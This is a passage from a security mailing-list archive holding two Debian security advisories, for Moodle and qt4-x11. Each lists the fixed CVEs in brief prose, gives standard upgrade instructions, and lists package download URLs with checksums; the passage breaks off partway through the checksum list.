iD8DBQFLaLrMmqjQ0CJFipgRAsIIAKDaKxrjGJURNYZqhbab5Ci9ShD8YwCgigF/ EsdbEOhtMEyVHxbpJc883Co= =kgK8 -----END PGP SIGNATURE----- From white at debian.org Tue Feb 2 19:16:23 2010 From: white at debian.org (Steffen Joeris) Date: Tue, 2 Feb 2010 20:16:23 +0100 (CET) Subject: [Full-disclosure] [SECURITY] [DSA 1986-1] New moodle packages fix several vulnerabilities Message-ID: <20100202191623.705D684941D@hannah.localdomain> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1986-1 security at debian.org http://www.debian.org/security/ Steffen Joeris February 02, 2010 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : moodle Vulnerability : several vulnerabilities Problem type : remote Debian-specific: no CVE IDs : CVE-2009-4297 CVE-2009-4298 CVE-2009-4299 CVE-2009-4301 CVE-2009-4302 CVE-2009-4303 CVE-2009-4305 Debian Bugs : 559531 Several vulnerabilities have been discovered in Moodle, an online course management system. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2009-4297 Multiple cross-site request forgery (CSRF) vulnerabilities have been discovered. CVE-2009-4298 It has been discovered that the LAMS module is prone to the disclosure of user account information. CVE-2009-4299 The Glossary module has an insufficient access control mechanism. CVE-2009-4301 Moodle does not properly check permissions when the MNET service is enabled, which allows remote authenticated servers to execute arbitrary MNET functions. CVE-2009-4302 The login/index_form.html page links to an HTTP page instead of using an SSL secured connection. CVE-2009-4303 Moodle stores sensitive data in backup files, which might make it possible for attackers to obtain them. CVE-2009-4305 It has been discovered that the SCORM module is prone to an SQL injection. Additionally, an SQL injection in the update_record function, a problem with symbolic links and a verification problem with Glossary, database and forum ratings have been fixed. For the stable distribution (lenny), these problems have been fixed in version 1.8.2.dfsg-3+lenny3. For the oldstable distribution (etch), there are no fixed packages available and it is too hard to backport many of the fixes. Therefore, we recommend to upgrade to the lenny version. For the testing distribution (squeeze) and the unstable distribution (sid), these problems have been fixed in version 1.8.2.dfsg-6. We recommend that you upgrade your moodle packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - -------------------------------- Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/m/moodle/moodle_1.8.2.dfsg-3+lenny3.dsc Size/MD5 checksum: 1332 e6692ee05c7eda37d36ef9a0d24ce2ae http://security.debian.org/pool/updates/main/m/moodle/moodle_1.8.2.dfsg.orig.tar.gz Size/MD5 checksum: 10162497 d116f83641c70216a94168aa2c303004 http://security.debian.org/pool/updates/main/m/moodle/moodle_1.8.2.dfsg-3+lenny3.diff.gz Size/MD5 checksum: 67070 e8843f3e443495842705c040c0d98779 Architecture independent packages: http://security.debian.org/pool/updates/main/m/moodle/moodle_1.8.2.dfsg-3+lenny3_all.deb Size/MD5 checksum: 8628382 1985ebd60f8f9f2fb03a25e9b0c58c50 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAktoecgACgkQ62zWxYk/rQe57QCfVN1fhshCzlLxiQBhNUzAHspM rrcAnjTYkLYcdwNBFMjZ32wFWbCEgoD1 =YJFS -----END PGP SIGNATURE----- From iuculano at debian.org Tue Feb 2 22:44:05 2010 From: iuculano at debian.org (Giuseppe Iuculano) Date: Tue, 2 Feb 2010 23:44:05 +0100 Subject: [Full-disclosure] [SECURITY] [DSA-1988-1] New qt4-x11 packages fix several vulnerabilities Message-ID: <20100202224405.GA21038@SD6-Casa.iuculano.it> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1988-1 security at debian.org http://www.debian.org/security/ Giuseppe Iuculano February 02, 2010 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Packages : qt4-x11 Vulnerability : several vulnerabilities Problem type : local (remote) Debian-specific: no CVE Ids : CVE-2009-0945 CVE-2009-1687 CVE-2009-1690 CVE-2009-1698 CVE-2009-1699 CVE-2009-1711 CVE-2009-1712 CVE-2009-1713 CVE-2009-1725 CVE-2009-2700 Debian Bugs : 532718 534946 538347 545793 Several vulnerabilities have been discovered in qt4-x11, a cross-platform C++ application framework. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2009-0945 Array index error in the insertItemBefore method in WebKit, as used in qt4-x11, allows remote attackers to execute arbitrary code. CVE-2009-1687 The JavaScript garbage collector in WebKit, as used in qt4-x11 does not properly handle allocation failures, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted HTML document that triggers write access to an "offset of a NULL pointer. CVE-2009-1690 Use-after-free vulnerability in WebKit, as used in qt4-x11, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) by setting an unspecified property of an HTML tag that causes child elements to be freed and later accessed when an HTML error occurs. CVE-2009-1698 WebKit in qt4-x11 does not initialize a pointer during handling of a Cascading Style Sheets (CSS) attr function call with a large numerical argument, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted HTML document. CVE-2009-1699 The XSL stylesheet implementation in WebKit, as used in qt4-x11 does not properly handle XML external entities, which allows remote attackers to read arbitrary files via a crafted DTD. CVE-2009-1711 WebKit in qt4-x11 does not properly initialize memory for Attr DOM objects, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document. CVE-2009-1712 WebKit in qt4-x11 does not prevent remote loading of local Java applets, which allows remote attackers to execute arbitrary code, gain privileges, or obtain sensitive information via an APPLET or OBJECT element. CVE-2009-1713 The XSLT functionality in WebKit, as used in qt4-x11 does not properly implement the document function, which allows remote attackers to read arbitrary local files and files from different security zones. CVE-2009-1725 WebKit in qt4-x11 does not properly handle numeric character references, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted HTML document. CVE-2009-2700 qt4-x11 does not properly handle a '\0' character in a domain name in the Subject Alternative Name field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority. The oldstable distribution (etch) is not affected by these problems. For the stable distribution (lenny), these problems have been fixed in version 4.4.3-1+lenny1. For the testing distribution (squeeze) and the unstable distribution (sid), these problems have been fixed in version 4.5.3-1. We recommend that you upgrade your qt4-x11 packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-x11_4.4.3.orig.tar.gz Size/MD5 checksum: 112939803 376c003317c4417326ba2116370227d0 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-x11_4.4.3-1+lenny1.diff.gz Size/MD5 checksum: 113988 44e1d7b1418a2ea5811b2ba390c6e5e2 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-x11_4.4.3-1+lenny1.dsc Size/MD5 checksum: 2517 a643e142a0548df25f447e5147e36434 Architecture independent packages: http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-doc_4.4.3-1+lenny1_all.deb Size/MD5 checksum: 52927996 d4f9f1f38e28b02b57f77631c80936c5 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-doc-html_4.4.3-1+lenny1_all.deb Size/MD5 checksum: 26654448 7e65171932e77223aa5b1393daec55f5 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-core_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 30804 242795a7b4b6b75655d0c2a1900b4f96 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dbus_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 256632 ea070e02a8243c8b73463820aa18c16c http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-svg_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 194438 7639b8b9266a76ffa2880e10b265bfd0 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-psql_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 64780 2e260f7f62771c80884a2a35dcb9b449 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-dev-tools_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 1642920 05ec919d8ff16f4e5bc9a3e3b0ce6718 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-webkit-dbg_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 54143826 a8112a75ecbdf5bf5fba60c5ffcf6639 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-network_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 493846 ab8a83e873d4b4df0353b24abdfde772 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dbg_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 90539672 57d2f91d1b32c724e8ac67fa185f08ce http://security.debian.org/pool/updates/main/q/qt4-x11/libqtgui4_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 4748512 dc56c050f7fd6162b5ea5b4a862e47ec http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-help_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 248966 0d4ee203a4eeead29a21142cf5f5f36a http://security.debian.org/pool/updates/main/q/qt4-x11/libqtcore4_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 2227462 3298ca0048afc6ba038e2173f76ad99b http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-sqlite2_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 45958 5c05bee20ac16e347b4df914df0ba573 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-webkit_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 3824480 fb0afb2adf09e056ac1b2a952f923f82 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xmlpatterns-dbg_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 14064920 9b168b2fe8e39d65a5de4ec66d98dbb3 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-assistant_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 41942 02c839761d645d29e364fa9d585e0155 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-qt3support_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 1510874 55bcc0f38bb98aded16cd3d058948f1a http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qmake_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 1842134 cc1c00d45977cdafc257a38a19c9f3d6 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qtconfig_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 148296 62a149e29e40961eb3ee9fa3f71e46cf http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dev_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 4747984 5940af0438fa7982819efc9361d4d218 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-demos_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 10853838 1b534f13f38e5c4d6d3a6605e27ca5ef http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xmlpatterns_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 986808 4008560ed1b894058f5f7f793224470f http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-opengl_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 194846 393eb42698732905ee322c2e88ea3cbf http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xml_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 149118 0d473109c91d1a3deb7af4bd6edd7975 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-odbc_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 74138 a395afc4c7c8ba3dad39322d08c9dfd2 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-gui_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 30798 05efcfccb419463c2b61fb1f3ca29a95 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-script_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 506180 e6d0197c68897fe67a908077b2784533 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-designer_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 2208902 3898119a8c37a4f40ec3e16269fbf32c http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-sqlite_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 50888 fef3650e86c4153c7247d2846d000431 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-designer_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 428680 f37d8592f6211e98858663bc7da5aa11 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-test_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 62188 6c0c7762f36acdb31cd172cb8d16746f http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-opengl-dev_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 41200 39bc11946cc3e99f9f54c2c0381e6dd4 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 144382 c12f803d4285afc61380fcdf04fcd4de http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-mysql_4.4.3-1+lenny1_alpha.deb Size/MD5 checksum: 59926 eaa5395d210bfe708d015c176d207481 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-sqlite_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 50214 3cbce693aef71ebfc94652571f581a16 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-test_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 61290 76c1ba9c1cc77a714e491ec648ac2d49 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qtconfig_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 134690 bf94e92323e68a1b948b7983e8883154 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-script_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 458816 2625fac9bd465f2267bb7cf3ca9b12b4 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-qt3support_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 1377026 0bc2e8c416723c12a1c2b5325f1d255d http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dbg_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 87591154 684110dfa018fb12451fade881f2b258 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-odbc_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 70622 c3d8b1eae3557735e3d2cffa1c27a943 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-network_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 456012 31697e41896daf771dcdcb4c342b9c06 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-demos_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 10553896 068c89d9d205cce3c972849793ddc8c6 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-opengl-dev_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 42370 21d5c9fbb91e60d69bd9ce720da2e459 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-mysql_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 58260 0fd799b66c8bdbcaefa98b9924f888ec http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-gui_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 30802 83b99b7cb51bd621183483db893bbeec http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-dev-tools_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 1537710 cc75e5bc1a0c87b20ed7100d4a293039 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-designer_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 2079558 559afbeeec5a3d3bd9df5c2dbc6d0896 http://security.debian.org/pool/updates/main/q/qt4-x11/libqtgui4_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 4274120 97907f0117b368f4b9f23e8599473261 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-core_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 30814 7e47a757325b8476e352b03a5c5aec78 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-svg_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 185344 f9f81022af95cf86541b7a21ca68c220 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-psql_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 62948 51bc553e17ca6d1f015faf7a70705e45 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-webkit-dbg_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 53394502 984acdfd4d9573bedbb1cb9fdea32099 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-webkit_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 3448144 7d523c3c7fcead5b0debdf212ab4b0d7 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qmake_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 1625680 3bf0cbca2bbd44cb0c84ce0c84ef51cf http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-assistant_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 42656 0ae1f63bf9d2776f6e4048d790ff0fb6 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-help_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 237786 b0240806281af4bde43a18ca30beaf9c http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dev_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 4306138 060500a3c0fd9443305bbc3833a2b2bc http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-opengl_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 186262 bf6a12b3e66e84a41c27cc64d8b9222b http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xmlpatterns_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 828912 cb315956769fcb6630164a2cc0db2a9f http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xml_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 137534 f7afd2dc5df6ba81c2e8aacd05263288 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-ibase_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 72788 a96bc474a1dc453038d3e20b91e7da26 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-sqlite2_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 46088 4a2e8968fc286fa45456feb782501e49 http://security.debian.org/pool/updates/main/q/qt4-x11/libqtcore4_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 2093718 97bc8a55dba288d7d8238b7c37242acc http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-designer_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 411410 25d97c749070beb820016b63e3275ef0 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xmlpatterns-dbg_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 13411206 ed59b0df741ce51e3fd53a20c0d2460f http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 132960 bfd90128e17d45d3d1a9e275cf9b8484 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dbus_4.4.3-1+lenny1_amd64.deb Size/MD5 checksum: 240992 baa32b82cf072af916cf54f348ac8b21 armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qmake_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 1490244 b7f5b5521e518f8195a93eaa64a47a6f http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-help_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 246778 c578bafdc84117e2e0489f345d63a328 http://security.debian.org/pool/updates/main/q/qt4-x11/libqtgui4_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 4090556 c364c817a98b4b55de7db3124d201a3d http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xmlpatterns-dbg_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 13976018 09b344b3f55cf804b29c7b902f358a66 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-core_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 30552 3d452b1bbe742911a2c49f0a0533c9f8 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dev_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 4302420 bbba102425af53a59e362e8f8ed8a176 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-dev-tools_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 1559374 b39af442b4a69b9e5ed26f3c949a8c45 http://security.debian.org/pool/updates/main/q/qt4-x11/libqtcore4_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 2051900 8b58466730fdfc163674f8ce67465ac1 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xmlpatterns_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 850514 7da47a92f793e4e87d5cf6ddac563a39 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-opengl-dev_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 42030 ae1f63cdb4c19c090c6efe685bfae0d6 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-odbc_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 72300 1b5f88254367f44211bdfdf921c39305 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-svg_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 182426 a39e968a814382611f19a5834655cdda http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-mysql_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 57682 874b69bbb0a4e184ccad60b18cf71e80 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-test_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 60030 8f8a1faf24aedb8c7db0d349ea894837 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-qt3support_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 1291440 cce8b6f8f434f8bc1ccb32779cf74644 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-opengl_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 178792 e7b00a6eed81bd71d2f5277e2595bd4f http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-demos_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 10208362 5bca5461f7ce8a51e55f130fd4c5d852 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-sqlite_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 49814 8038cb08e95871bcdbc6eed747729874 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-gui_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 30542 145c03d402a1d9cdeb105acc4dfd9add http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 129170 a5cc1ffd87f255b17187b9116a9a902f http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-script_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 417314 193284b6d133efd2ce923c4c3498b76e http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-network_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 457766 b8337c15ad7022f03a339d76e288e510 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-webkit-dbg_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 51245582 f28d2c30200aa4c3dfa1c658aa8194c3 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-assistant_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 42882 2bb5d6c5158c98e0e753118653e100e6 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-designer_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 405660 1cf50d4eadc18a9ec58a0b64a57e4bb3 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dbg_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 89502610 17620beaf7eb7648a6e76bd3b6ef5b81 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-designer_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 2052626 9d52d385b4dfe5b3e84e9f37f6a5262d http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-psql_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 62778 96b4ad6c7002d4b5d6e0d29b8c3c48c4 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xml_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 139982 0e82833ffd6e4370103a67002551850e http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-webkit_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 2935026 7a1986aa9702df21c770f4b66477e0eb http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-sqlite2_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 45656 b41efd29606c780b4fde733ca7fadd2b http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qtconfig_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 133334 79223e7f554a07aec91ee2dd23683edf http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dbus_4.4.3-1+lenny1_armel.deb Size/MD5 checksum: 233960 e4fddb32150f6d343bfcc85e7b58215a hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-odbc_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 76570 d8ed6f1595b23cdff3874e2bc9bc16ab http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-script_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 502954 af0b3cc8554f302f8e0a8837b2793499 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dbg_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 88102392 6910957cabd74c068fb43581a7654495 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xmlpatterns_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 1047740 bce5cbb0da6e22a8e3fa9d82faf69a48 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-test_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 65002 d54455c037071dfa191e7fa774068345 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xml_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 164024 271f70ccadf4536f0168be44d2edb617 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-help_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 272194 5ceba67ab66f9c687ccd5aa6dd9a2a42 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-sqlite_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 52802 ee752bab39d48e9ed3aa9ac22b459fdc http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qtconfig_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 139864 4f5c9f13f9b53d7174ed75bafd186490 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dbus_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 269716 8c763165b42e2e7fcc2163fd61229a96 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-assistant_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 43398 b7b64dfe8ceeb67d551faee74f8e8184 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-network_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 534088 2c2ab2681f9b1d71fa6cc7f16c4aab66 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qmake_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 1733748 7c2e5e485e341b2440f08cd720d63ee5 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-demos_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 10984260 b721e64df219e2afda07c0a9dae77bd3 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-sqlite2_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 48060 ed2b04165cfb65391efbc5a857ef925a http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-opengl-dev_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 42290 27850d5246ca6fd752d8391adb686d48 http://security.debian.org/pool/updates/main/q/qt4-x11/libqtgui4_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 5050272 9788f089c1d28f7b5daefc7948aa0d93 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xmlpatterns-dbg_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 13472070 1ef74506e71dfe9d4f54eea5f17888cf 